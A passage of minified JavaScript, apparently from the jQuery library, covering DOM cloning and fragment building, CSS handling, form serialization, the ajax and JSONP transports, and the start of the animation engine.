e.querySelectorAll!=="undefined"?e.querySelectorAll(b5||"*"):bS;if(!b3){for(b3=[],b2=e.childNodes||e;(b1=b2[b4])!=null;b4++){if(!b5||aw.nodeName(b1,b5)){b3.push(b1)}else{aw.merge(b3,ag(b1,b5))}}}return b5===bS||b5&&aw.nodeName(e,b5)?aw.merge([e],b3):b3}function ac(e){if(ay.test(e.type)){e.defaultChecked=e.checked}}aw.extend({clone:function(b4,b1,b2){var b3,b8,b7,b5,e,b6=aw.contains(b4.ownerDocument,b4);if(aw.support.html5Clone||aw.isXMLDoc(b4)||!bf.test("<"+b4.nodeName+">")){e=b4.cloneNode(true)}else{ad.innerHTML=b4.outerHTML;ad.removeChild(e=ad.firstChild)}if((!aw.support.noCloneEvent||!aw.support.noCloneChecked)&&(b4.nodeType===1||b4.nodeType===11)&&!aw.isXMLDoc(b4)){b3=ag(e);b8=ag(b4);for(b5=0;(b7=b8[b5])!=null;++b5){if(b3[b5]){ab(b7,b3[b5])}}}if(b1){if(b2){b8=b8||ag(b4);b3=b3||ag(e);for(b5=0;(b7=b8[b5])!=null;b5++){u(b7,b3[b5])}}else{u(b4,e)}}b3=ag(e,"script");if(b3.length>0){bK(b3,!b6&&ag(b4,"script"))}b3=b8=b7=null;return e},buildFragment:function(b3,b1,b9,ca){var e,b2,cb,cd,ce,cc,b5,b6=b3.length,b8=J(b1),b7=[],b4=0;for(;b4<b6;b4++){b2=b3[b4];if(b2||b2===0){if(aw.type(b2)==="object"){aw.merge(b7,b2.nodeType?[b2]:b2)}else{if(!a2.test(b2)){b7.push(b1.createTextNode(b2))}else{cd=cd||b8.appendChild(b1.createElement("div"));cb=(bw.exec(b2)||["",""])[1].toLowerCase();ce=bW[cb]||bW._default;cd.innerHTML=ce[1]+b2.replace(bI,"<$1></$2>")+ce[2];b5=ce[0];while(b5--){cd=cd.lastChild}if(!aw.support.leadingWhitespace&&a6.test(b2)){b7.push(b1.createTextNode(a6.exec(b2)[0]))}if(!aw.support.tbody){b2=cb==="table"&&!bx.test(b2)?cd.firstChild:ce[1]==="<table>"&&!bx.test(b2)?cd:0;b5=b2&&b2.childNodes.length;while(b5--){if(aw.nodeName((cc=b2.childNodes[b5]),"tbody")&&!cc.childNodes.length){b2.removeChild(cc)}}}aw.merge(b7,cd.childNodes);cd.textContent="";while(cd.firstChild){cd.removeChild(cd.firstChild)}cd=b8.lastChild}}}}if(cd){b8.removeChild(cd)}if(!aw.support.appendChecked){aw.grep(ag(b7,"input"),ac)}b4=0;while((b2=b7[b4++])){if(ca&&aw.inArray(b2,ca)!==-1){continue}e=aw.contains(b2.ownerDocument,b2);cd=ag(b8.appendChild(b2),"script");if(e){bK(cd)}if(b9){b5=0;while((b2=cd[b5++])){if(br.test(b2.type||"")){b9.push(b2)}}}}cd=null;return b8},cleanData:function(b5,e){var b2,b7,b4,ca,b6=0,b8=aw.expando,b1=aw.cache,b3=aw.support.deleteExpando,b9=aw.event.special;for(;(b4=b5[b6])!=null;b6++){if(e||aw.acceptData(b4)){b7=b4[b8];b2=b7&&b1[b7];if(b2){if(b2.events){for(ca in b2.events){if(b9[ca]){aw.event.remove(b4,ca)}else{aw.removeEvent(b4,ca,b2.handle)}}}if(b1[b7]){delete b1[b7];if(b3){delete b4[b8]}else{if(typeof b4.removeAttribute!=="undefined"){b4.removeAttribute(b8)}else{b4[b8]=null}}w.push(b7)}}}}}});var R,aj,an,aG=/alpha\([^)]*\)/i,bj=/opacity\s*=\s*([^)]*)/,bl=/^(top|right|bottom|left)$/,aQ=/^(none|table(?!-c[ea]).+)/,a8=/^margin/,bh=new RegExp("^("+z+")(.*)$","i"),bg=new RegExp("^("+z+")(?!px)[a-z%]+$","i"),bo=new RegExp("^([+-])=("+z+")","i"),Y={BODY:"block"},Q={position:"absolute",visibility:"hidden",display:"block"},O={letterSpacing:0,fontWeight:400},N=["Top","Right","Bottom","Left"],P=["Webkit","O","Moz","ms"];function bT(b4,b2){if(b2 in b4){return b2}var e=b2.charAt(0).toUpperCase()+b2.slice(1),b3=b2,b1=P.length;while(b1--){b2=P[b1]+e;if(b2 in b4){return b2}}return b3}function au(b1,e){b1=e||b1;return aw.css(b1,"display")==="none"||!aw.contains(b1.ownerDocument,b1)}function bM(b1,b4){var e,b5=[],b2=0,b3=b1.length;for(;b2<b3;b2++){e=b1[b2];if(!e.style){continue}b5[b2]=aw._data(e,"olddisplay");if(b4){if(!b5[b2]&&e.style.display==="none"){e.style.display=""}if(e.style.display===""&&au(e)){b5[b2]=aw._data(e,"olddisplay",M(e.nodeName))}}else{if(!b5[b2]&&!au(e)){aw._data(e,"olddisplay",aw.css(e,"display"))}}}for(b2=0;b2<b3;b2++){e=b1[b2];if(!e.style){continue}if(!b4||e.style.display==="none"||e.style.display===""){e.style.display=b4?b5[b2]||"":"none"}}return b1}aw.fn.extend({css:function(e,b1){return aw.access(this,function(b2,b6,b8){var b7,b4,b5={},b3=0;if(aw.isArray(b6)){b7=aj(b2);b4=b6.length;for(;b3<b4;b3++){b5[b6[b3]]=aw.css(b2,b6[b3],false,b7)}return b5}return b8!==bS?aw.style(b2,b6,b8):aw.css(b2,b6)},e,b1,arguments.length>1)},show:function(){return bM(this,true)},hide:function(){return bM(this)},toggle:function(b1){var e=typeof b1==="boolean";return this.each(function(){if(e?b1:au(this)){aw(this).show()}else{aw(this).hide()}})}});aw.extend({cssHooks:{opacity:{get:function(b1,e){if(e){var b2=R(b1,"opacity");return b2===""?"1":b2}}}},cssNumber:{columnCount:true,fillOpacity:true,fontWeight:true,lineHeight:true,opacity:true,orphans:true,widows:true,zIndex:true,zoom:true},cssProps:{"float":aw.support.cssFloat?"cssFloat":"styleFloat"},style:function(b2,b5,ca,b3){if(!b2||b2.nodeType===3||b2.nodeType===8||!b2.style){return}var b7,b9,b4,b6=aw.camelCase(b5),b8=b2.style;b5=aw.cssProps[b6]||(aw.cssProps[b6]=bT(b8,b6));b4=aw.cssHooks[b5]||aw.cssHooks[b6];if(ca!==bS){b9=typeof ca;if(b9==="string"&&(b7=bo.exec(ca))){ca=(b7[1]+1)*b7[2]+parseFloat(aw.css(b2,b5));b9="number"}if(ca==null||b9==="number"&&isNaN(ca)){return}if(b9==="number"&&!aw.cssNumber[b6]){ca+="px"}if(!aw.support.clearCloneStyle&&ca===""&&b5.indexOf("background")===0){b8[b5]="inherit"}if(!b4||!("set" in b4)||(ca=b4.set(b2,ca,b3))!==bS){try{b8[b5]=ca}catch(b1){}}}else{if(b4&&"get" in b4&&(b7=b4.get(b2,false,b3))!==bS){return b7}return b8[b5]}},css:function(e,b3,b1,b6){var b7,b4,b2,b5=aw.camelCase(b3);b3=aw.cssProps[b5]||(aw.cssProps[b5]=bT(e.style,b5));b2=aw.cssHooks[b3]||aw.cssHooks[b5];if(b2&&"get" in b2){b7=b2.get(e,true,b1)}if(b7===bS){b7=R(e,b3,b6)}if(b7==="normal"&&b3 in O){b7=O[b3]}if(b1){b4=parseFloat(b7);return b1===true||aw.isNumeric(b4)?b4||0:b7}return b7},swap:function(b2,b5,b1,e){var b6,b3,b4={};for(b3 in b5){b4[b3]=b2.style[b3];b2.style[b3]=b5[b3]}b6=b1.apply(b2,e||[]);for(b3 in b5){b2.style[b3]=b4[b3]}return b6}});if(bU.getComputedStyle){aj=function(e){return bU.getComputedStyle(e,null)};R=function(b2,b5,e){var b8,b4,b3,b1=e||aj(b2),b6=b1?b1.getPropertyValue(b5)||b1[b5]:bS,b7=b2.style;if(b1){if(b6===""&&!aw.contains(b2.ownerDocument,b2)){b6=aw.style(b2,b5)}if(bg.test(b6)&&a8.test(b5)){b8=b7.width;b4=b7.minWidth;b3=b7.maxWidth;b7.minWidth=b7.maxWidth=b7.width=b6;b6=b1.width;b7.width=b8;b7.minWidth=b4;b7.maxWidth=b3}}return b6}}else{if(V.documentElement.currentStyle){aj=function(e){return e.currentStyle};R=function(b2,b4,e){var b3,b6,b7,b1=e||aj(b2),b5=b1?b1[b4]:bS,b8=b2.style;if(b5==null&&b8&&b8[b4]){b5=b8[b4]}if(bg.test(b5)&&!bl.test(b4)){b3=b8.left;b6=b2.runtimeStyle;b7=b6&&b6.left;if(b7){b6.left=b2.currentStyle.left}b8.left=b4==="fontSize"?"1em":b5;b5=b8.pixelLeft+"px";b8.left=b3;if(b7){b6.left=b7}}return b5===""?"auto":b5}}}function bL(e,b3,b2){var b1=bh.exec(b3);return b1?Math.max(0,b1[1]-(b2||0))+(b1[2]||"px"):b3}function q(e,b4,b1,b3,b5){var b2=b1===(b3?"border":"content")?4:b4==="width"?1:0,b6=0;for(;b2<4;b2+=2){if(b1==="margin"){b6+=aw.css(e,b1+N[b2],true,b5)}if(b3){if(b1==="content"){b6-=aw.css(e,"padding"+N[b2],true,b5)}if(b1!=="margin"){b6-=aw.css(e,"border"+N[b2]+"Width",true,b5)}}else{b6+=aw.css(e,"padding"+N[b2],true,b5);if(b1!=="padding"){b6+=aw.css(e,"border"+N[b2]+"Width",true,b5)}}}return b6}function ak(e,b3,b1){var b6=true,b5=b3==="width"?e.offsetWidth:e.offsetHeight,b4=aj(e),b2=aw.support.boxSizing&&aw.css(e,"boxSizing",false,b4)==="border-box";if(b5<=0||b5==null){b5=R(e,b3,b4);if(b5<0||b5==null){b5=e.style[b3]}if(bg.test(b5)){return b5}b6=b2&&(aw.support.boxSizingReliable||b5===e.style[b3]);b5=parseFloat(b5)||0}return(b5+q(e,b3,b1||(b2?"border":"content"),b6,b4))+"px"}function M(b2){var b1=V,e=Y[b2];if(!e){e=d(b2,b1);if(e==="none"||!e){an=(an||aw("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(b1.documentElement);b1=(an[0].contentWindow||an[0].contentDocument).document;b1.write("<!doctype html><html><body>");b1.close();e=d(b2,b1);an.detach()}Y[b2]=e}return e}function d(b3,b1){var b2=aw(b1.createElement(b3)).appendTo(b1.body),e=aw.css(b2[0],"display");b2.remove();return e}aw.each(["height","width"],function(e,b1){aw.cssHooks[b1]={get:function(b3,b2,b4){if(b2){return b3.offsetWidth===0&&aQ.test(aw.css(b3,"display"))?aw.swap(b3,Q,function(){return ak(b3,b1,b4)}):ak(b3,b1,b4)}},set:function(b2,b5,b3){var b4=b3&&aj(b2);return bL(b2,b5,b3?q(b2,b1,b3,aw.support.boxSizing&&aw.css(b2,"boxSizing",false,b4)==="border-box",b4):0)}}});if(!aw.support.opacity){aw.cssHooks.opacity={get:function(b1,e){return bj.test((e&&b1.currentStyle?b1.currentStyle.filter:b1.style.filter)||"")?(0.01*parseFloat(RegExp.$1))+"":e?"1":""},set:function(b1,b5){var b4=b1.style,e=b1.currentStyle,b3=aw.isNumeric(b5)?"alpha(opacity="+b5*100+")":"",b2=e&&e.filter||b4.filter||"";b4.zoom=1;if((b5>=1||b5==="")&&aw.trim(b2.replace(aG,""))===""&&b4.removeAttribute){b4.removeAttribute("filter");if(b5===""||e&&!e.filter){return}}b4.filter=aG.test(b2)?b2.replace(aG,b3):b2+" "+b3}}}aw(function(){if(!aw.support.reliableMarginRight){aw.cssHooks.marginRight={get:function(b1,e){if(e){return aw.swap(b1,{display:"inline-block"},R,[b1,"marginRight"])}}}}if(!aw.support.pixelPosition&&aw.fn.position){aw.each(["top","left"],function(e,b1){aw.cssHooks[b1]={get:function(b3,b2){if(b2){b2=R(b3,b1);return bg.test(b2)?aw(b3).position()[b1]+"px":b2}}}})}});if(aw.expr&&aw.expr.filters){aw.expr.filters.hidden=function(e){return(e.offsetWidth===0&&e.offsetHeight===0)||(!aw.support.reliableHiddenOffsets&&((e.style&&e.style.display)||aw.css(e,"display"))==="none")};aw.expr.filters.visible=function(e){return !aw.expr.filters.hidden(e)}}aw.each({margin:"",padding:"",border:"Width"},function(e,b1){aw.cssHooks[e+b1]={expand:function(b5){var b3=0,b2={},b4=typeof b5==="string"?b5.split(" "):[b5];for(;b3<4;b3++){b2[e+N[b3]+b1]=b4[b3]||b4[b3-2]||b4[0]}return b2}};if(!a8.test(e)){aw.cssHooks[e+b1].set=bL}});var aF=/%20/g,aJ=/\[\]$/,aO=/\r?\n/g,bv=/^(?:submit|button|image|reset)$/i,bu=/^(?:input|select|textarea|keygen)/i;aw.fn.extend({serialize:function(){return aw.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=aw.prop(this,"elements");return e?aw.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!aw(this).is(":disabled")&&bu.test(this.nodeName)&&!bv.test(e)&&(this.checked||!ay.test(e))}).map(function(b1,e){var b2=aw(this).val();return b2==null?null:aw.isArray(b2)?aw.map(b2,function(b3){return{name:e.name,value:b3.replace(aO,"\r\n")}}):{name:e.name,value:b2.replace(aO,"\r\n")}}).get()}});aw.param=function(e,b4){var b2,b3=[],b1=function(b5,b6){b6=aw.isFunction(b6)?b6():(b6==null?"":b6);b3[b3.length]=encodeURIComponent(b5)+"="+encodeURIComponent(b6)};if(b4===bS){b4=aw.ajaxSettings&&aw.ajaxSettings.traditional}if(aw.isArray(e)||(e.jquery&&!aw.isPlainObject(e))){aw.each(e,function(){b1(this.name,this.value)})}else{for(b2 in e){s(b2,e[b2],b4,b1)}}return b3.join("&").replace(aF,"+")};function s(b3,b2,b4,e){var b1;if(aw.isArray(b2)){aw.each(b2,function(b5,b6){if(b4||aJ.test(b3)){e(b3,b6)}else{s(b3+"["+(typeof b6==="object"?b5:"")+"]",b6,b4,e)}})}else{if(!b4&&aw.type(b2)==="object"){for(b1 in b2){s(b3+"["+b1+"]",b2[b1],b4,e)}}else{e(b3,b2)}}}var m,l,g=aw.now(),h=/\?/,a0=/#.*$/,bz=/([?&])_=[^&]*/,a1=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,a7=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,bd=/^(?:GET|HEAD)$/,bm=/^\/\//,bC=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,c=aw.fn.load,aD={},bP={},n="*/".concat("*");try{l=ax.href}catch(X){l=V.createElement("a");l.href="";l=l.href}m=bC.exec(l.toLowerCase())||[];function f(e){return function(b2,b4){if(typeof b2!=="string"){b4=b2;b2="*"}var b1,b5=0,b3=b2.toLowerCase().match(B)||[];if(aw.isFunction(b4)){while((b1=b3[b5++])){if(b1[0]==="+"){b1=b1.slice(1)||"*";(e[b1]=e[b1]||[]).unshift(b4)}else{(e[b1]=e[b1]||[]).push(b4)}}}}}function ao(b6,b3,b4,b2){var b1={},b5=(b6===bP);function e(b7){var b8;b1[b7]=true;aw.each(b6[b7]||[],function(b9,cb){var ca=cb(b3,b4,b2);if(typeof ca==="string"&&!b5&&!b1[ca]){b3.dataTypes.unshift(ca);e(ca);return false}else{if(b5){return !(b8=ca)}}});return b8}return e(b3.dataTypes[0])||!b1["*"]&&e("*")}function j(b4,b3){var b2,e,b1=aw.ajaxSettings.flatOptions||{};for(b2 in b3){if(b3[b2]!==bS){(b1[b2]?b4:(e||(e={})))[b2]=b3[b2]}}if(e){aw.extend(true,b4,e)}return b4}aw.fn.load=function(b7,b2,e){if(typeof b7!=="string"&&c){return c.apply(this,arguments)}var b4,b6,b3,b5=this,b1=b7.indexOf(" ");if(b1>=0){b4=b7.slice(b1,b7.length);b7=b7.slice(0,b1)}if(aw.isFunction(b2)){e=b2;b2=bS}else{if(b2&&typeof b2==="object"){b6="POST"}}if(b5.length>0){aw.ajax({url:b7,type:b6,dataType:"html",data:b2}).done(function(b8){b3=arguments;b5.html(b4?aw("<div>").append(aw.parseHTML(b8)).find(b4):b8)}).complete(e&&function(b8,b9){b5.each(e,b3||[b8.responseText,b9,b8])})}return this};aw.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,b1){aw.fn[b1]=function(b2){return this.on(b1,b2)}});aw.each(["get","post"],function(e,b1){aw[b1]=function(b5,b3,b2,b4){if(aw.isFunction(b3)){b4=b4||b2;b2=b3;b3=bS}return aw.ajax({url:b5,type:b1,dataType:b4,data:b3,success:b2})}});aw.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:l,type:"GET",isLocal:a7.test(m[1]),global:true,processData:true,async:true,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":n,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":bU.String,"text html":true,"text json":aw.parseJSON,"text xml":aw.parseXML},flatOptions:{url:true,context:true}},ajaxSetup:function(b1,e){return e?j(j(b1,aw.ajaxSettings),e):j(aw.ajaxSettings,b1)},ajaxPrefilter:f(aD),ajaxTransport:f(bP),ajax:function(cn,cb){if(typeof cn==="object"){cb=cn;cn=bS}cb=cb||{};var cm,b1,cg,cf,cl,cc,b7,b9,ch=aw.ajaxSetup({},cb),b2=ch.context||ch,b8=ch.context&&(b2.nodeType||b2.jquery)?aw(b2):aw.event,b4=aw.Deferred(),b3=aw.Callbacks("once memory"),cj=ch.statusCode||{},cd={},ce={},ci=0,ck="canceled",ca={readyState:0,getResponseHeader:function(e){var co;if(ci===2){if(!cf){cf={};while((co=a1.exec(cg))){cf[co[1].toLowerCase()]=co[2]}}co=cf[e.toLowerCase()]}return co==null?null:co},getAllResponseHeaders:function(){return ci===2?cg:null},setRequestHeader:function(co,cp){var e=co.toLowerCase();if(!ci){co=ce[e]=ce[e]||co;cd[co]=cp}return this},overrideMimeType:function(e){if(!ci){ch.mimeType=e}return this},statusCode:function(co){var e;if(co){if(ci<2){for(e in co){cj[e]=[cj[e],co[e]]}}else{ca.always(co[ca.status])}}return this},abort:function(co){var e=co||ck;if(cm){cm.abort(e)}b5(0,e);return this}};b4.promise(ca).complete=b3.add;ca.success=ca.done;ca.error=ca.fail;ch.url=((cn||ch.url||l)+"").replace(a0,"").replace(bm,m[1]+"//");ch.type=cb.method||cb.type||ch.method||ch.type;ch.dataTypes=aw.trim(ch.dataType||"*").toLowerCase().match(B)||[""];if(ch.crossDomain==null){cc=bC.exec(ch.url.toLowerCase());ch.crossDomain=!!(cc&&(cc[1]!==m[1]||cc[2]!==m[2]||(cc[3]||(cc[1]==="http:"?80:443))!=(m[3]||(m[1]==="http:"?80:443))))}if(ch.data&&ch.processData&&typeof ch.data!=="string"){ch.data=aw.param(ch.data,ch.traditional)}ao(aD,ch,cb,ca);if(ci===2){return ca}b7=ch.global;if(b7&&aw.active++===0){aw.event.trigger("ajaxStart")}ch.type=ch.type.toUpperCase();ch.hasContent=!bd.test(ch.type);b1=ch.url;if(!ch.hasContent){if(ch.data){b1=(ch.url+=(h.test(b1)?"&":"?")+ch.data);delete ch.data}if(ch.cache===false){ch.url=bz.test(b1)?b1.replace(bz,"$1_="+g++):b1+(h.test(b1)?"&":"?")+"_="+g++}}if(ch.ifModified){if(aw.lastModified[b1]){ca.setRequestHeader("If-Modified-Since",aw.lastModified[b1])}if(aw.etag[b1]){ca.setRequestHeader("If-None-Match",aw.etag[b1])}}if(ch.data&&ch.hasContent&&ch.contentType!==false||cb.contentType){ca.setRequestHeader("Content-Type",ch.contentType)}ca.setRequestHeader("Accept",ch.dataTypes[0]&&ch.accepts[ch.dataTypes[0]]?ch.accepts[ch.dataTypes[0]]+(ch.dataTypes[0]!=="*"?", "+n+"; q=0.01":""):ch.accepts["*"]);for(b9 in ch.headers){ca.setRequestHeader(b9,ch.headers[b9])}if(ch.beforeSend&&(ch.beforeSend.call(b2,ca,ch)===false||ci===2)){return ca.abort()}ck="abort";for(b9 in {success:1,error:1,complete:1}){ca[b9](ch[b9])}cm=ao(bP,ch,cb,ca);if(!cm){b5(-1,"No Transport")}else{ca.readyState=1;if(b7){b8.trigger("ajaxSend",[ca,ch])}if(ch.async&&ch.timeout>0){cl=setTimeout(function(){ca.abort("timeout")},ch.timeout)}try{ci=1;cm.send(cd,b5)}catch(b6){if(ci<2){b5(-1,b6)}else{throw b6}}}function b5(cu,cr,ct,co){var cp,cw,e,cs,cq,cv=cr;if(ci===2){return}ci=2;if(cl){clearTimeout(cl)}cm=bS;cg=co||"";ca.readyState=cu>0?4:0;if(ct){cs=k(ch,ca,ct)}if(cu>=200&&cu<300||cu===304){if(ch.ifModified){cq=ca.getResponseHeader("Last-Modified");if(cq){aw.lastModified[b1]=cq}cq=ca.getResponseHeader("etag");if(cq){aw.etag[b1]=cq}}if(cu===304){cp=true;cv="notmodified"}else{cp=i(ch,cs);cv=cp.state;cw=cp.data;e=cp.error;cp=!e}}else{e=cv;if(cu||!cv){cv="error";if(cu<0){cu=0}}}ca.status=cu;ca.statusText=(cr||cv)+"";if(cp){b4.resolveWith(b2,[cw,cv,ca])}else{b4.rejectWith(b2,[ca,cv,e])}ca.statusCode(cj);cj=bS;if(b7){b8.trigger(cp?"ajaxSuccess":"ajaxError",[ca,ch,cp?cw:e])}b3.fireWith(b2,[ca,cv]);if(b7){b8.trigger("ajaxComplete",[ca,ch]);if(!(--aw.active)){aw.event.trigger("ajaxStop")}}}return ca},getScript:function(b1,e){return aw.get(b1,bS,e,"script")},getJSON:function(b2,b1,e){return aw.get(b2,b1,e,"json")}});function k(b8,b5,b7){var b1,b9,b3,b4,e=b8.contents,b2=b8.dataTypes,b6=b8.responseFields;for(b9 in b6){if(b9 in b7){b5[b6[b9]]=b7[b9]}}while(b2[0]==="*"){b2.shift();if(b1===bS){b1=b8.mimeType||b5.getResponseHeader("Content-Type")}}if(b1){for(b9 in e){if(e[b9]&&e[b9].test(b1)){b2.unshift(b9);break}}}if(b2[0] in b7){b3=b2[0]}else{for(b9 in b7){if(!b2[0]||b8.converters[b9+" "+b2[0]]){b3=b9;break}if(!b4){b4=b9}}b3=b3||b4}if(b3){if(b3!==b2[0]){b2.unshift(b3)}return b7[b3]}}function i(ca,b9){var b1,b2,b4,cb,b3={},b7=0,b5=ca.dataTypes.slice(),b8=b5[0];if(ca.dataFilter){b9=ca.dataFilter(b9,ca.dataType)}if(b5[1]){for(b1 in ca.converters){b3[b1.toLowerCase()]=ca.converters[b1]}}for(;(b4=b5[++b7]);){if(b4!=="*"){if(b8!=="*"&&b8!==b4){b1=b3[b8+" "+b4]||b3["* "+b4];if(!b1){for(b2 in b3){cb=b2.split(" ");if(cb[1]===b4){b1=b3[b8+" "+cb[0]]||b3["* "+cb[0]];if(b1){if(b1===true){b1=b3[b2]}else{if(b3[b2]!==true){b4=cb[0];b5.splice(b7--,0,b4)}}break}}}}if(b1!==true){if(b1&&ca["throws"]){b9=b1(b9)}else{try{b9=b1(b9)}catch(b6){return{state:"parsererror",error:b1?b6:"No conversion from "+b8+" to "+b4}}}}}b8=b4}}return{state:"success",data:b9}}aw.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){aw.globalEval(e);return e}}});aw.ajaxPrefilter("script",function(e){if(e.cache===bS){e.cache=false}if(e.crossDomain){e.type="GET";e.global=false}});aw.ajaxTransport("script",function(b1){if(b1.crossDomain){var b2,e=V.head||aw("head")[0]||V.documentElement;return{send:function(b3,b4){b2=V.createElement("script");b2.async=true;if(b1.scriptCharset){b2.charset=b1.scriptCharset}b2.src=b1.url;b2.onload=b2.onreadystatechange=function(b5,b6){if(b6||!b2.readyState||/loaded|complete/.test(b2.readyState)){b2.onload=b2.onreadystatechange=null;if(b2.parentNode){b2.parentNode.removeChild(b2)}b2=null;if(!b6){b4(200,"success")}}};e.insertBefore(b2,e.firstChild)},abort:function(){if(b2){b2.onload(bS,true)}}}}});var aB=[],a4=/(=)\?(?=&|$)|\?\?/;aw.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=aB.pop()||(aw.expando+"_"+(g++));this[e]=true;return e}});aw.ajaxPrefilter("json jsonp",function(b6,b3,b1){var e,b4,b5,b2=b6.jsonp!==false&&(a4.test(b6.url)?"url":typeof b6.data==="string"&&!(b6.contentType||"").indexOf("application/x-www-form-urlencoded")&&a4.test(b6.data)&&"data");if(b2||b6.dataTypes[0]==="jsonp"){e=b6.jsonpCallback=aw.isFunction(b6.jsonpCallback)?b6.jsonpCallback():b6.jsonpCallback;if(b2){b6[b2]=b6[b2].replace(a4,"$1"+e)}else{if(b6.jsonp!==false){b6.url+=(h.test(b6.url)?"&":"?")+b6.jsonp+"="+e}}b6.converters["script json"]=function(){if(!b5){aw.error(e+" was not called")}return b5[0]};b6.dataTypes[0]="json";b4=bU[e];bU[e]=function(){b5=arguments};b1.always(function(){bU[e]=b4;if(b6[e]){b6.jsonpCallback=b3.jsonpCallback;aB.push(e)}if(b5&&aw.isFunction(b4)){b4(b5[0])}b5=b4=bS});return"script"}});var bX,b0,bY=0,bZ=bU.ActiveXObject&&function(){var e;for(e in bX){bX[e](bS,true)}};function K(){try{return new bU.XMLHttpRequest()}catch(b1){}}function G(){try{return new bU.ActiveXObject("Microsoft.XMLHTTP")}catch(b1){}}aw.ajaxSettings.xhr=bU.ActiveXObject?function(){return !this.isLocal&&K()||G()}:K;b0=aw.ajaxSettings.xhr();aw.support.cors=!!b0&&("withCredentials" in b0);b0=aw.support.ajax=!!b0;if(b0){aw.ajaxTransport(function(b1){if(!b1.crossDomain||aw.support.cors){var e;return{send:function(b5,b2){var b4,b6,b7=b1.xhr();if(b1.username){b7.open(b1.type,b1.url,b1.async,b1.username,b1.password)}else{b7.open(b1.type,b1.url,b1.async)}if(b1.xhrFields){for(b6 in b1.xhrFields){b7[b6]=b1.xhrFields[b6]}}if(b1.mimeType&&b7.overrideMimeType){b7.overrideMimeType(b1.mimeType)}if(!b1.crossDomain&&!b5["X-Requested-With"]){b5["X-Requested-With"]="XMLHttpRequest"}try{for(b6 in b5){b7.setRequestHeader(b6,b5[b6])}}catch(b3){}b7.send((b1.hasContent&&b1.data)||null);e=function(b8,cb){var ce,cf,cc,cd,cg;try{if(e&&(cb||b7.readyState===4)){e=bS;if(b4){b7.onreadystatechange=aw.noop;if(bZ){delete bX[b4]}}if(cb){if(b7.readyState!==4){b7.abort()}}else{cd={};ce=b7.status;cg=b7.responseXML;cc=b7.getAllResponseHeaders();if(cg&&cg.documentElement){cd.xml=cg}if(typeof b7.responseText==="string"){cd.text=b7.responseText}try{cf=b7.statusText}catch(b9){cf=""}if(!ce&&b1.isLocal&&!b1.crossDomain){ce=cd.text?200:404}else{if(ce===1223){ce=204}}}}}catch(ca){if(!cb){b2(-1,ca)}}if(cd){b2(ce,cf,cd,cc)}};if(!b1.async){e()}else{if(b7.readyState===4){setTimeout(e)}else{b4=++bY;if(bZ){if(!bX){bX={};aw(bU).unload(bZ)}bX[b4]=e}b7.onreadystatechange=e}}},abort:function(){if(e){e(bS,true)}}}}})}var ae,bO,aZ=/^(?:toggle|show|hide)$/,aY=new RegExp("^(?:([+-])=|)("+z+")([a-z%]*)$","i"),bq=/queueHooks$/,p=[T],bR={"*":[function(b3,b9){var e,b8,b7=this.createTween(b3,b9),b2=aY.exec(b9),b6=b7.cur(),b5=+b6||0,b4=1,b1=20;if(b2){e=+b2[2];b8=b2[3]||(aw.cssNumber[b3]?"":"px");if(b8!=="px"&&b5){b5=aw.css(b7.elem,b3,true)||e||1;do{b4=b4||".5";b5=b5/b4;aw.style(b7.elem,b3,b5+b8)}while(b4!==(b4=b7.cur()/b6)&&b4!==1&&--b1)}b7.unit=b8;b7.start=b5;b7.end=b2[1]?b5+(b2[1]+1)*e:e}return b7}]};function H(){setTimeout(function(){ae=bS});return(ae=aw.now())}function L(e,b1){aw.each(b1,function(b5,b6){var b2=(bR[b5]||[]).concat(bR["*"]),b3=0,b4=b2.length;for(;b3<b4;b3++){if(b2[b3].call(e,b5,b6)){return}}})}function o(b2,b6,b5){var b8,b9,b3=0,b4=p.length,b1=aw.Deferred().always(function(){delete ca.elem}),ca=function(){if(b9){return false}var cb=ae||H(),cf=Math.max(0,e.startTime+e.duration-cb),cg=cf/e.duration||0,ce=1-cg,cc=0,cd=e.tweens.length;for(;cc<cd;cc++){e.tweens[cc].run(ce)}b1.notifyWith(b2,[e,ce,cf]);if(ce<1&&cd){return cf}else{b1.resolveWith(b2,[e]);return false}},e=b1.promise({elem:b2,props:aw.extend({},b6),opts:aw.extend(true,{specialEasing:{}},b5),originalProperties:b6,originalOptions:b5,startTime:ae||H(),duration:b5.duration,tweens:[],createTween:function(cc,cb){var cd=aw.Tween(b2,e.opts,cc,cb,e.opts.specialEasing[cc]||e.opts.easing);e.tweens.push(cd);return cd},stop:function(cb){var cc=0,cd=cb?e.tweens.length:0;if(b9){return this}b9=true;for(;cc<cd;cc++){e.tweens[cc].run(1)}if(cb){b1.resolveWith(b2,[e,cb])}else{b1.rejectWith(b2,[e,cb])}return this}}),b7=e.props;aE(b7,e.opts.specialEasing);for(;b3<b4;b3++){b8=p[b3].call(e,b2,b7,e.opts);if(b8){return b8}}L(e,b7);if(aw.isFunction(e.opts.start)){e.opts.start.call(b2,e)}aw.fx.timer(aw.extend(ca,{elem:b2,anim:e,queue:e.opts.queue}));return e.progress(e.opts.progress).done(e.opts.done,e.opts.complete).fail(e.opts.fail).always(e.opts.always)}function aE(b4,b5){var b2,b3,e,b6,b1;for(b2 in b4){b3=aw.camelCase(b2);e=b5[b3];b6=b4[b2];if(aw.isArray(b6)){e=b6[1];b6=b4[b2]=b6[0]}if(b2!==b3){b4[b3]=b6;delete b4[b2]}b1=aw.cssHooks[b3];if(b1&&"expand" in b1){b6=b1.expand(b6);delete b4[b3];for(b2 in b6){if(!(b2 in 